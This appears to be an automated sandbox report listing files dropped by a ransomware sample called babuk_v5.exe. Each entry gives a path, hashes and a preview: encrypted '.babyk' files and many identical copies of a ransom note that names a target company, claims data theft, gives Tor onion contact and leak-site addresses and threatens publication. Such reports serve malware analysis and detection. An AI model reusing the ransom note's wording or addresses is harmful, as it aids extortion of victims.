                                                                            SSDEEP:3:tljOiN5hTFuuBF7bLIA/nYQVkIoAKBxNLb9NYRq8p9pMCZkn7ewq8LUxNvEEn:zf5u8VLIEnYQVtaHZbQ5vpMCZk7zL0vt
                                                                            MD5:FDF355884D6F91AD24A4FAD763759D60
                                                                            SHA1:A8325D5D23EABC85FEB082AF7617BC07D33A0E13
                                                                            SHA-256:2D9F855459CD1A980DC59FF1C32173F52B95F6C92650E785D4E42DFCC93EA057
                                                                            SHA-512:D3D5E029BD8B1520E583EE3441F33450897AAF48A61EABFB966CA8D645FE7960637E84066532ED08AB28230D69255022422E44B643538AF58F366FD6F95482BF
                                                                            Malicious:false
                                                                            Preview: ......i.[dk.$n.&..... ..UB q.. *.>.m?G....@.*Es.6i....c.8...8.....I..L.p...Z..2..=.{..OWP.?....e.P.E...1...m..nL...sc..j.n..[....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.976717289721395
                                                                            Encrypted:false
                                                                            SSDEEP:192:9IVoyZozMmwIdKoTMDde/6vX/hrxxPtFXtQ7X4nv6:yJmB5TMR4Y/hVFXujS6
                                                                            MD5:3E68BE13B90BC105A50817D81DF3C85C
                                                                            SHA1:33BD910BB5E7C376054DF67684B6FBF7FA36F3C9
                                                                            SHA-256:CA1617C4B7703EC75EB27A0750DE4D5ABE14873B8277D5B4F2257D3D6C2FE764
                                                                            SHA-512:6C517D900AA2FCE6F55B95489401B8494962B3EB1FD14D6600CD92AED4AED72C71DF3370A379996761D8A4D881DA0E6FC591B2DA49373845C7E6ECED15B9163A
                                                                            Malicious:false
                                                                            Preview: .S....bNx.........:.U..&...O..b......S.W.D2R.cdd.%.b..\<M.S.!Z}.M.q...{+..]&.......$N..Cb....]..v.f|...f..Fz....~YO......*.L..Y..bV..".......9.....#.9.......o.g...k.D......"...)R..t.j...SD....6u.../.*...s.vV.....*..E..&...{..]5.l4i,...j.B.?.6...PX.6....Lh.=.JmO....G,%.1..2..{v.L_...s(.Sqm|..._..>."...D...V{...v......._.T..|..b.;hp...m'..F...../6...m;..l.^..ix....7l0.......|.)...<..s..f...."X[...HI..M...M_...x....k.......H.L..!R....[.....}.V."......8..n..=......B.U...h....0,....3.~.......P.r..,.t..G.u.....?..X1-..d....o..t.\./..Z...pC..Y..../.4....G*|.UX%..2.Dx....?h!.Va+...o..b...l..,$...]...{).}..\.>.e..V..W..E1.oZ....lg;..p....(........G.....Ti...X..7....a&/3.~#upl.......l..[...f`D..u.G.#o/...tS.....*mJ..'.B...iyw!.........M..F/E.Tm..!. ..o.a.Y.CfloIx*".p.b..(,.K...X8.P9.R.1.2.&..|n..2.;=..Pt...{:...I..._h`.#7~...^0..r..e...%....T>...[1...-......9.T#.R.2PV.E.&.H...V.J.zT...!...x..8{..%....A...r..:.._..X......ev}a...c
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.577972184978332
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlgdZiyE2GdHEhghxJU33k0W87nWCAalTeeyo+mfC6D9SXmUxNvEEn:QdMyE2GVcAAQ87nWCA4Bxrfd9SXm0vtn
                                                                            MD5:4FB9EB6DCBEC9B03E25DD5D939B16D00
                                                                            SHA1:988D58826B4F201C0F045C8417B9E30DA07CDE91
                                                                            SHA-256:5A20D7202DE203EB03101499D3A54A8287CC95CFDAB595536CD20E374C71E37F
                                                                            SHA-512:B27894113AC59C5861B265C0B241E325F8B762B417F87AB9159D8037F097B0F0E6231CEAAB7907BC909B87AAE7394FF79EFB794393F9BBE7C0FB1E502709056B
                                                                            Malicious:false
                                                                            Preview: ....!l....URD...I.a.......L?....s..m-.........q.>}.1...e.@D!._L...D.......#.........#p..w..r;..(....~...;H.P..s*.*L.\.U....%5..<......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.978507510401312
                                                                            Encrypted:false
                                                                            SSDEEP:96:qbre+O8ZKmTYlWS6MLttxOI+FwnH96aSSe0zMu4Fl00TYcA359exdxkX7U7zzCG6:giZeKm8AML9OEd664DN+CxP+yQaJtSKO
                                                                            MD5:DCCCE75DCD59F16A76D4C7363593A96F
                                                                            SHA1:147601FD05FD607BB72F95C0209708171C7E06FF
                                                                            SHA-256:F41D13DC4EDE93FFD719A493C5E5A7AC2357B0964F72A919295B1CCBEF582FD8
                                                                            SHA-512:A19913F9E9AA45AE2EB5DE653E1EEC5066A22123089F9526A9B24345E8DABAD07D40FAB644CDFC205488F8E4F9240908F5971A04D76863A6D03F5471188D76D5
                                                                            Malicious:false
                                                                            Preview: b.T....r.f.....i.`....5........e.. 1..d.....RAtm8#.1.X{!}...t6....!....NR..l.l'...5q$......7D.R>.bd..bh.^.}..]4Cp.).N.D0.c.7...G.2c..1.b.l.O..r...<p.n.^..H...TF..qR...5..h...4.@.. U.....x.$6../J....a.d.da.E1d...3...G ./K..3..6['.....p.. ..r>....u.[.z.I;rd?"=..>..%.!&F./.....-b..4O..5p......<*.=.Z........~..6...PS..g<....o{.0.BSo....uL%..'N...B..o...W..C...q.EW..8j.t,..v.=.z1..S..N%.{.T"A....B.c...k/..W2.*....C.P^...2..70....%p....^....n.U.......a.O...K.. ...U.3...mA.<KB.h.!|..:...0'..H.....y..~.G.....$..v..rn..e@....6.+..../B#..a/..'.......v..!..k.........X....%.>..|[(.....ylS%. j....3.(.w~.v.D..^.D.j...TI..-~.....w.R=&.8Zw..0..T.3......-.D.G'0.hP.6.A%Y..g..(.wT.........../.(...4..u.a........-...Y.B.t5].....j.{.}...5......$.....pe.%z.B&...E.".%.b..j]..X...6..wH..#P..s;..M..M...6...&).=..X/2...).Jwq...v@...%......5^...tjJT.).].......'`.....X.XO.+K.4....f.J,.r.h..]U.Q,.H~Cg.m..9.D...t..q...(Hv). .S_l4hR...f.$...%....P.~.S.>..,I.(\.q4.P..:.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
